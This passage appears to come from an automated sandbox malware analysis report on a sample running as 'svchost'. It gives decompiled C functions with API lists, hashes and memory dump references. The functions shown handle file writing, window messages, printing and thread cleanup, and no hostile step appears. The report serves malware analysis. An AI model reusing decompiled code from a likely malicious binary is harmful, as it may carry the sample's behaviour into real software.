    • IsWindowVisible.USER32(?), ref: 0040C4CA
      • Part of subcall function 0048564F: GetWindowTextLengthA.USER32(?), ref: 0048565C
      • Part of subcall function 0048564F: GetWindowTextA.USER32(?,00000000,00000000), ref: 00485674
      • Part of subcall function 00481EBD: SendMessageA.USER32(?,00000466,00000000,00000000), ref: 00481EC9
    • wsprintfA.USER32 ref: 0040C564
    • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 0040C590
    • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 0040C59F
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$MessageSend$Text$EnabledLengthVisiblewsprintf
    • String ID:
    • API String ID: 1914814478-0
    • Opcode ID: 7f6843b00e3a6c143c9f07dd9d013d7023cafb1de238dfd30d83a026e76b7ef1
    • Instruction ID: bd987cdda7fc0f1e3033716245ee201fce7238b823defe85cc8de57dfb77059b
    • Opcode Fuzzy Hash: 7f6843b00e3a6c143c9f07dd9d013d7023cafb1de238dfd30d83a026e76b7ef1
    • Instruction Fuzzy Hash: 15517C75204700AFC724EF14C991B5BB7F5BB88710F108E2EE59A97780DB78E801CB96
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0047AF68 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0047AF68(long _a4, void* _a8, long _a12) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				void _v1048;
				void** _t66;
				signed int _t67;
				intOrPtr _t69;
				signed int _t70;
				intOrPtr _t71;
				signed int _t73;
				signed int _t80;
				int _t85;
				long _t87;
				intOrPtr* _t91;
				intOrPtr _t97;
				struct _OVERLAPPED* _t101;
				long _t103;
				signed int _t105;
				struct _OVERLAPPED* _t106;

				_t101 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_a12 != 0) {
					_t91 = 0x4e1ca0 + (_a4 >> 5) * 4;
					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
					if(__eflags != 0) {
						E0047BF5F(__eflags, _a4, 0, 2);
					}
					_t66 =  *_t91 + _t105;
					__eflags = _t66[1] & 0x00000080;
					if((_t66[1] & 0x00000080) == 0) {
						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
						__eflags = _t67;
						if(_t67 == 0) {
							_a4 = GetLastError();
						} else {
							_a4 = _t101;
							_v12 = _v16;
						}
						L15:
						_t69 = _v12;
						__eflags = _t69 - _t101;
						if(_t69 != _t101) {
							_t70 = _t69 - _v20;
							__eflags = _t70;
							return _t70;
						}
						__eflags = _a4 - _t101;
						if(_a4 == _t101) {
							L25:
							_t71 =  *_t91;
							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
								L27:
								 *((intOrPtr*)(E0047213D())) = 0x1c;
								_t73 = E00472146();
								 *_t73 = _t101;
								L24:
								return _t73 | 0xffffffff;
							}
							__eflags =  *_a8 - 0x1a;
							if( *_a8 == 0x1a) {
								goto L1;
							}
							goto L27;
						}
						_t106 = 5;
						__eflags = _a4 - _t106;
						if(_a4 != _t106) {
							_t73 = E004720CA(_a4);
						} else {
							 *((intOrPtr*)(E0047213D())) = 9;
							_t73 = E00472146();
							 *_t73 = _t106;
						}
						goto L24;
					}
					__eflags = _a12 - _t101;
					_v8 = _a8;
					_a4 = _t101;
					if(_a12 <= _t101) {
						goto L25;
					} else {
						goto L6;
					}
					do {
						L6:
						_t80 =  &_v1048;
						do {
							__eflags = _v8 - _a8 - _a12;
							if(_v8 - _a8 >= _a12) {
								break;
							}
							_v8 = _v8 + 1;
							_t97 =  *_v8;
							__eflags = _t97 - 0xa;
							if(_t97 == 0xa) {
								_v20 = _v20 + 1;
								 *_t80 = 0xd;
								_t80 = _t80 + 1;
								__eflags = _t80;
							}
							 *_t80 = _t97;
							_t80 = _t80 + 1;
							__eflags = _t80 -  &_v1048 - 0x400;
						} while (_t80 -  &_v1048 < 0x400);
						_t103 = _t80 -  &_v1048;
						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0);
						__eflags = _t85;
						if(_t85 == 0) {
							_a4 = GetLastError();
							break;
						}
						_t87 = _v16;
						_v12 = _v12 + _t87;
						__eflags = _t87 - _t103;
						if(_t87 < _t103) {
							break;
						}
						__eflags = _v8 - _a8 - _a12;
					} while (_v8 - _a8 < _a12);
					_t101 = 0;
					__eflags = 0;
					goto L15;
				}
				L1:
				return 0;
			}























    0x0047af74
    0x0047af79
    0x0047af7c
    0x0047af7f
    0x0047af8e
    0x0047afa0
    0x0047afa3
    0x0047afa8
    0x0047afb0
    0x0047afb5
    0x0047afba
    0x0047afbc
    0x0047afc0
    0x0047b094
    0x0047b09a
    0x0047b09c
    0x0047b0af
    0x0047b09e
    0x0047b0a1
    0x0047b0a4
    0x0047b0a4
    0x0047b050
    0x0047b050
    0x0047b053
    0x0047b055
    0x0047b0eb
    0x0047b0eb
    0x00000000
    0x0047b0eb
    0x0047b05b
    0x0047b05e
    0x0047b0c2
    0x0047b0c2
    0x0047b0c4
    0x0047b0c9
    0x0047b0d7
    0x0047b0dc
    0x0047b0e2
    0x0047b0e7
    0x0047b0bd
    0x00000000
    0x0047b0bd
    0x0047b0ce
    0x0047b0d1
    0x00000000
    0x00000000
    0x00000000
    0x0047b0d1
    0x0047b062
    0x0047b063
    0x0047b066
    0x0047b0b7
    0x0047b068
    0x0047b06d
    0x0047b073
    0x0047b078
    0x0047b078
    0x00000000
    0x0047b066
    0x0047afc9
    0x0047afcc
    0x0047afcf
    0x0047afd2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0047afd8
    0x0047afd8
    0x0047afd8
    0x0047afde
    0x0047afe4
    0x0047afe7
    0x00000000
    0x00000000
    0x0047afec
    0x0047afef
    0x0047aff1
    0x0047aff4
    0x0047aff6
    0x0047aff9
    0x0047affc
    0x0047affc
    0x0047affc
    0x0047affd
    0x0047afff
    0x0047b00a
    0x0047b00a
    0x0047b01a
    0x0047b02f
    0x0047b035
    0x0047b037
    0x0047b082
    0x00000000
    0x0047b082
    0x0047b039
    0x0047b03c
    0x0047b03f
    0x0047b041
    0x00000000
    0x00000000
    0x0047b049
    0x0047b049
    0x0047b04e
    0x0047b04e
    0x00000000
    0x0047b04e
    0x0047af81
    0x00000000

    APIs
    • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,?), ref: 0047B02F
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: FileWrite
    • String ID:
    • API String ID: 3934441357-0
    • Opcode ID: 7b42350f713331369749ede0ca77ba3f13e225eaba5b7c3cedbd9e98ea7938b1
    • Instruction ID: 349c951b4c03eaad82187f912ac13991ae29201e047897cbd0d61bdc403550c1
    • Opcode Fuzzy Hash: 7b42350f713331369749ede0ca77ba3f13e225eaba5b7c3cedbd9e98ea7938b1
    • Instruction Fuzzy Hash: 1F516E71900288EFCB11CF68CD84BDE7BB4FF81344F20C1AAE9299B251D7749A41CB99
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00432DA0 Relevance: 6.1, APIs: 4, Instructions: 108windowCOMMON
    Download Yara Rule
    C-Code - Quality: 88%
    			E00432DA0(void* __ecx, void* __edi, void* __ebp, void* _a4, char _a5, char _a6) {
				signed int _v0;
				long _v4;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _t33;
				struct HWND__* _t34;
				void* _t44;
				signed int _t45;
				signed int _t48;
				char _t59;
				void* _t69;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				intOrPtr _t79;

				_t78 = __ebp;
				_t69 = __edi;
				_push(0xffffffff);
				_push(E0048FB28);
				_t33 =  *[fs:0x0];
				_push(_t33);
				 *[fs:0x0] = _t79;
				_push(__ecx);
				_t48 = _a4;
				_t73 = __ecx;
				if(_t48 < 0x20) {
					L16:
					 *[fs:0x0] = _v12;
					return _t33;
				} else {
					if((_t48 & 0x00000080) == 0) {
						L5:
						 *0x4c9e04 = 0;
						_t34 =  *(_t73 + 0x68);
						if(_t34 == 0 || IsWindow(_t34) == 0) {
							_a4 = _t48;
							if((_t48 & 0x00000080) == 0) {
								_a5 = 0;
							} else {
								_a5 = _t48 >> 0x10;
								_a6 = 0;
							}
							_t33 = E004331C0(_t73,  &_a4,  &_a4);
							goto L16;
						} else {
							_t33 = E00484C84(_t78,  *(_t73 + 0x68));
							_t75 = _t33;
							if(_t75 == 0) {
								goto L16;
							} else {
								_t59 =  *0x4b8924; // 0x4b8938
								_push(_t69);
								_v16 = _t59;
								_v4 = 0;
								E0048564F(_t75,  &_v16);
								SendMessageA( *(_t75 + 0x1c), 0xb1,  *(_v20 - 8), 0xffffffff);
								SendMessageA( *(_t75 + 0x1c), 0xb7, 0, 0);
								_v0 = _t48;
								if((_t48 & 0x00000080) == 0) {
									_a5 = 0;
								} else {
									_a5 = _t48 >> 0x10;
									_a6 = 0;
								}
								SendMessageA( *(_t75 + 0x1c), 0xc2, 0,  &_a4);
								_v4 = 0xffffffff;
								_t44 = E004832C2( &_v16);
								 *[fs:0x0] = _v12;
								return _t44;
							}
						}
					} else {
						_t45 =  *0x4c9e04; // 0x0
						if(_t45 != 0) {
							_t48 = (_t48 & 0x0000ffff) << 0x00000010 | _t45 & 0x0000ffff;
							goto L5;
						} else {
							 *0x4c9e04 = _t48;
							 *[fs:0x0] = _v12;
							return _t45;
						}
					}
				}
			}



















    0x00432da0
    0x00432da0
    0x00432da0
    0x00432da2
    0x00432da7
    0x00432dad
    0x00432dae
    0x00432db5
    0x00432db7
    0x00432dbf
    0x00432dc1
    0x00432ef9
    0x00432eff
    0x00432f09
    0x00432dc7
    0x00432dca
    0x00432dfe
    0x00432dfe
    0x00432e08
    0x00432e0d
    0x00432ed4
    0x00432ed8
    0x00432ee8
    0x00432eda
    0x00432edd
    0x00432ee1
    0x00432ee1
    0x00432ef4
    0x00000000
    0x00432e22
    0x00432e26
    0x00432e2b
    0x00432e2f
    0x00000000
    0x00432e35
    0x00432e35
    0x00432e3b
    0x00432e3c
    0x00432e47
    0x00432e4f
    0x00432e6d
    0x00432e7c
    0x00432e81
    0x00432e85
    0x00432e95
    0x00432e87
    0x00432e8a
    0x00432e8e
    0x00432e8e
    0x00432eaa
    0x00432eb0
    0x00432eb8
    0x00432ec4
    0x00432ece
    0x00432ece
    0x00432e2f
    0x00432dcc
    0x00432dcc
    0x00432dd3
    0x00432dfc
    0x00000000
    0x00432dd5
    0x00432dd5
    0x00432de1
    0x00432deb
    0x00432deb
    0x00432dd3
    0x00432dca

    APIs
    • IsWindow.USER32(?), ref: 00432E14
    • SendMessageA.USER32(?,000000B1,?,000000FF), ref: 00432E6D
    • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00432E7C
    • SendMessageA.USER32(?,000000C2,00000000,?), ref: 00432EAA
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: MessageSend$Window
    • String ID:
    • API String ID: 2326795674-0
    • Opcode ID: 735925222bfde7a94e5c1965392b5419306209860c1cf60619de6be2c9f927ce
    • Instruction ID: d1833186cce305fd34451ed049030a5475bfdc9332e43bce871fdeb49bb5441b
    • Opcode Fuzzy Hash: 735925222bfde7a94e5c1965392b5419306209860c1cf60619de6be2c9f927ce
    • Instruction Fuzzy Hash: DE41A072248741AFD320DB19CD41B6BB7D4EB98720F048A2EE495877D1D3B8D804CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00446F10 Relevance: 6.1, APIs: 4, Instructions: 100windowCOMMON
    Download Yara Rule
    C-Code - Quality: 86%
    			E00446F10(signed int __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, long _a40) {
				int _v4;
				signed int _v16;
				intOrPtr* _t36;
				long _t38;
				int _t44;
				signed int _t64;
				intOrPtr* _t70;
				intOrPtr* _t74;
				intOrPtr _t76;
				signed int _t78;
				intOrPtr _t84;

				_push(0xffffffff);
				_push(E004904D3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t84;
				_push(__ecx);
				_t78 = __ecx;
				_v16 = __ecx;
				E00484873(__ecx);
				_t2 = _t78 + 0x64; // 0x64
				_t74 = _t2;
				_v4 = 0;
				 *(_t74 + 4) = 0;
				 *_t74 = 0x4988e0;
				 *((intOrPtr*)(__ecx + 0x3c)) = _a16;
				_t36 = _a8;
				 *((intOrPtr*)(__ecx)) = 0x498828;
				 *((intOrPtr*)(__ecx + 0x40)) = _a20;
				 *(__ecx + 0x44) = 0;
				_t11 = _t78 + 0x48; // 0x48
				_t70 = _t11;
				_v4 = 1;
				 *_t70 =  *_t36;
				 *((intOrPtr*)(_t70 + 4)) =  *((intOrPtr*)(_t36 + 4));
				 *((intOrPtr*)(_t70 + 8)) =  *((intOrPtr*)(_t36 + 8));
				 *((intOrPtr*)(_t70 + 0xc)) =  *((intOrPtr*)(_t36 + 0xc));
				_t38 = _a40;
				 *((intOrPtr*)(__ecx + 0x5c)) = _a36;
				 *(__ecx + 0x60) = _t38;
				E00489EBE(_t74, CreateSolidBrush(_t38));
				if(E0048B3DA(_t78, 0x50800044, _a8, _v4, _a4) != 0) {
					_t44 = E00489EEB(_a28);
					 *(_t78 + 0x58) = _t44;
					SendMessageA( *(_t78 + 0x1c), 0x30, _t44, 0);
					_t76 = _a20;
					_t87 = _t76;
					if(_t76 != 0) {
						E0048754F(_t78, _t76);
					}
					_t64 = _t78;
					E004471D0(_t64, _t87);
					if(_a24 == 1) {
						asm("repne scasb");
						SendMessageA( *(_t78 + 0x1c), 0xb1,  !(_t64 | 0xffffffff) - 1, 0xffffffff);
						SendMessageA( *(_t78 + 0x1c), 0xb7, 0, 0);
					}
					E0048768A(_t78);
				}
				 *[fs:0x0] = _v16;
				return _t78;
			}














    0x00446f10
    0x00446f12
    0x00446f1d
    0x00446f1e
    0x00446f25
    0x00446f28
    0x00446f2b
    0x00446f2f
    0x00446f34
    0x00446f34
    0x00446f37
    0x00446f3f
    0x00446f46
    0x00446f58
    0x00446f5b
    0x00446f5d
    0x00446f63
    0x00446f66
    0x00446f6f
    0x00446f6f
    0x00446f72
    0x00446f77
    0x00446f7c
    0x00446f82
    0x00446f8c
    0x00446f8f
    0x00446f94
    0x00446f97
    0x00446fa3
    0x00446fc1
    0x00446fc7
    0x00446fdb
    0x00446fde
    0x00446fe0
    0x00446fe4
    0x00446fe6
    0x00446feb
    0x00446feb
    0x00446ff0
    0x00446ff2
    0x00446ffc
    0x00447003
    0x00447014
    0x00447023
    0x00447023
    0x00447027
    0x00447027
    0x00447035
    0x0044703f

    APIs
    • CreateSolidBrush.GDI32(?), ref: 00446F9A
    • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 00446FDE
    • SendMessageA.USER32(?,000000B1,?,000000FF), ref: 00447014
    • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00447023
      • Part of subcall function 0048754F: SetWindowTextA.USER32(?,004212EA), ref: 0048755D
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: MessageSend$BrushCreateSolidTextWindow
    • String ID:
    • API String ID: 3501373727-0
    • Opcode ID: 011d70481c2db633ce059aa5fc501eba1a313e232633fee74454ebb70b6bd81e
    • Instruction ID: 3ed102fc73cc5fc2bbc401f8fd1c0080af077b488359080c7949eda273387ad4
    • Opcode Fuzzy Hash: 011d70481c2db633ce059aa5fc501eba1a313e232633fee74454ebb70b6bd81e
    • Instruction Fuzzy Hash: B6317E70604700AFD324EF19C851B2AFBE5FB88714F148A1EF55597791CBB8E800CB99
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004125A0 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004125A0(void* __ebp, intOrPtr _a4) {
				char _v68;
				int _t24;
				intOrPtr _t50;

				_t50 = _a4;
				if( *(_t50 + 0x24c) == 0) {
					L10:
					return 0;
				} else {
					 *((intOrPtr*)(_t50 + 0xa8)) =  *((intOrPtr*)(_t50 + 0xa8)) + 1;
					 *((intOrPtr*)(_t50 + 0x244)) = 0;
					 *((intOrPtr*)(_t50 + 0x240)) = 0;
					if( *((intOrPtr*)(_t50 + 0x25c)) != 0) {
						_t24 = EndPage( *(_t50 + 0x24c));
						 *((intOrPtr*)(_t50 + 0x25c)) = 0;
						if((0 | _t24 >= 0x00000000) != 0) {
							goto L5;
						} else {
							goto L9;
						}
					} else {
						if(StartPage( *(_t50 + 0x24c)) < 0) {
							L9:
							E00412A30(_t50);
							goto L10;
						} else {
							E004127A0(_t50);
							 *((intOrPtr*)(_t50 + 0x25c)) = 1;
							if(EndPage( *(_t50 + 0x24c)) < 0) {
								goto L9;
							} else {
								 *((intOrPtr*)(_t50 + 0x25c)) = 0;
								L5:
								if( *((intOrPtr*)(_t50 + 0xf4)) != 0) {
									E00418A40(0x7e2, 0, 0);
									E0041EF10( *((intOrPtr*)(_t50 + 0xa8)),  &_v68);
									E0048754F(_t50 + 0x134,  &_v68);
									UpdateWindow( *(_t50 + 0x150));
								}
								return 1;
							}
						}
					}
				}
			}






    0x004125a4
    0x004125b1
    0x00412692
    0x00412699
    0x004125b7
    0x004125c6
    0x004125cc
    0x004125d2
    0x004125d8
    0x00412672
    0x0041267a
    0x00412689
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004125de
    0x004125ed
    0x0041268b
    0x0041268d
    0x00000000
    0x004125f3
    0x004125f5
    0x004125fa
    0x00412613
    0x00000000
    0x00412615
    0x00412615
    0x0041261b
    0x00412621
    0x0041262a
    0x0041263b
    0x0041264e
    0x0041265a
    0x0041265a
    0x0041266a
    0x0041266a
    0x00412613
    0x004125ed
    0x004125d8

    APIs
    • StartPage.GDI32(?), ref: 004125E5
    • EndPage.GDI32(?), ref: 0041260B
      • Part of subcall function 0041EF10: wsprintfA.USER32 ref: 0041EF1F
      • Part of subcall function 0048754F: SetWindowTextA.USER32(?,004212EA), ref: 0048755D
    • UpdateWindow.USER32(?), ref: 0041265A
    • EndPage.GDI32(?), ref: 00412672
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Page$Window$StartTextUpdatewsprintf
    • String ID:
    • API String ID: 104827578-0
    • Opcode ID: 44cec65270ae8c177933e563ac315670e623aa8e0cdb22bd971afd91c16a9933
    • Instruction ID: 8d49f5fdef177c773c2a6bc3049d2e228969864625704c36bfdb14e9ce8d3118
    • Opcode Fuzzy Hash: 44cec65270ae8c177933e563ac315670e623aa8e0cdb22bd971afd91c16a9933
    • Instruction Fuzzy Hash: F2216571601B009BC7259B3ACD44ADBB7E5EFC4704F14882EE59FC6251E674A445CB58
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048CB55 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
    Download Yara Rule
    C-Code - Quality: 24%
    			E0048CB55(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t31;
				intOrPtr _t34;
				long* _t39;
				intOrPtr* _t44;
				signed int _t47;
				long* _t48;
				intOrPtr* _t51;

				_push(__ecx);
				_t51 = _a4;
				_t39 = __ecx;
				_t47 = 1;
				_v8 = _t47;
				if( *((intOrPtr*)(_t51 + 8)) <= _t47) {
					L10:
					_t48 =  &(_t39[7]);
					 *0x49224c(_t48);
					E0048C7CF( &(_t39[5]), _t51);
					 *0x492250(_t48);
					LocalFree( *(_t51 + 0xc));
					if(_t51 != 0) {
						 *((intOrPtr*)( *_t51))(1);
					}
					_t31 = TlsSetValue( *_t39, 0);
					L13:
					return _t31;
				} else {
					goto L1;
				}
				do {
					L1:
					_t34 = _a8;
					if(_t34 == 0 ||  *((intOrPtr*)(_t39[4] + 4 + _t47 * 8)) == _t34) {
						_t44 =  *((intOrPtr*)( *(_t51 + 0xc) + _t47 * 4));
						if(_t44 != 0) {
							 *((intOrPtr*)( *_t44))(1);
						}
						_t31 =  *(_t51 + 0xc);
						 *(_t31 + _t47 * 4) =  *(_t31 + _t47 * 4) & 0x00000000;
					} else {
						_t31 =  *(_t51 + 0xc);
						if( *(_t31 + _t47 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t47 = _t47 + 1;
				} while (_t47 <  *((intOrPtr*)(_t51 + 8)));
				if(_v8 == 0) {
					goto L13;
				}
				goto L10;
			}











    0x0048cb58
    0x0048cb5b
    0x0048cb61
    0x0048cb63
    0x0048cb67
    0x0048cb6a
    0x0048cbae
    0x0048cbae
    0x0048cbb2
    0x0048cbbc
    0x0048cbc2
    0x0048cbcb
    0x0048cbd3
    0x0048cbdb
    0x0048cbdb
    0x0048cbe1
    0x0048cbe7
    0x0048cbeb
    0x00000000
    0x00000000
    0x00000000
    0x0048cb6c
    0x0048cb6c
    0x0048cb6c
    0x0048cb71
    0x0048cb8e
    0x0048cb93
    0x0048cb99
    0x0048cb99
    0x0048cb9b
    0x0048cb9e
    0x0048cb7c
    0x0048cb7c
    0x0048cb83
    0x0048cb85
    0x0048cb85
    0x0048cb83
    0x0048cba2
    0x0048cba3
    0x0048cbac
    0x00000000
    0x00000000
    0x00000000

    APIs
    • RtlEnterCriticalSection.NTDLL(?), ref: 0048CBB2
    • RtlLeaveCriticalSection.NTDLL(?), ref: 0048CBC2
    • LocalFree.KERNEL32(?), ref: 0048CBCB
    • TlsSetValue.KERNEL32(?,00000000), ref: 0048CBE1
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CriticalSection$EnterFreeLeaveLocalValue
    • String ID:
    • API String ID: 2949335588-0
    • Opcode ID: 9a69ea20fbf7c2507d09341e4d7991d8e478e7cc6493a8661130b3bccb61907b
